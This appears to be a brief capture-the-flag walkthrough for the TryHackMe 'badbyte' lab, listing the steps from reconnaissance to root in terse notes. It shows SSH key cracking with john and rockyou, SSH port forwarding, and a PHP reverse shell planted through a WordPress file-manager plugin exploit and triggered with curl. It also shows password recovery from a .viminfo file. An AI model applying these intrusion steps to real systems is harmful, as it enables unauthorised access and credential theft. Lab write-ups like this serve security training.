TryHackMe | badbyte by electronforce

Task 1 | Deploy the machine

Task 2 | Reconnaissance

Q1: How many ports are open?

rustscan
nmap -p- -vv 10.10.206.236 -oA 10.10.206.236

Task 3 | Foothold

ftp to host
python /opt/john/ssh2john.py id_rsa > id_rsa.hash
john id_rsa.hash -w=$(locate rockyou.txt)
note.txt
john the ripper
root:~# chmod 600 id_rsa
Note.txt

Task 4 | Port Forwarding

Q7: What main TCP ports are listening on localhost?

ssh -ND 9050 -i id_rsa username@$ip
ssh dynamic port forward

Task 5 | Web Exploitation

Q9: What CMS is running on the machine?

ssh local port forward
nmap http-wordpress-enum
cp /usr/share/webshells/php/php-reverse-shell.php /tmp/s.php
download exploit
manually used script by
Catching the shell
curl http://127.0.0.1:8080/wp-content/plugins/wp-file-manager/lib/php/../files/s.php
boom user.txt

Task 6 | Privilege Escalation

Q16: What is the user’s old password?

.viminfo in home directory
.viminfo contents
w00t root.txt
